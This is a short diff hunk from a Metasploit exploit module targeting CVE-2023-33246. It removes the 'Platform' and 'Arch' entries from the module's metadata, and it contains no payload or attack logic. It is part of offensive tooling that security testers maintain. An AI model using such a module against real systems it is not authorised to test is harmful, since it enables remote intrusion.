@@ -32,9 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2023-33246']
         ],
         'License' => MSF_LICENSE,
-        'Platform' => %w[unix linux],
         'Privileged' => false,
-        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Automatic (Unix In-Memory)',
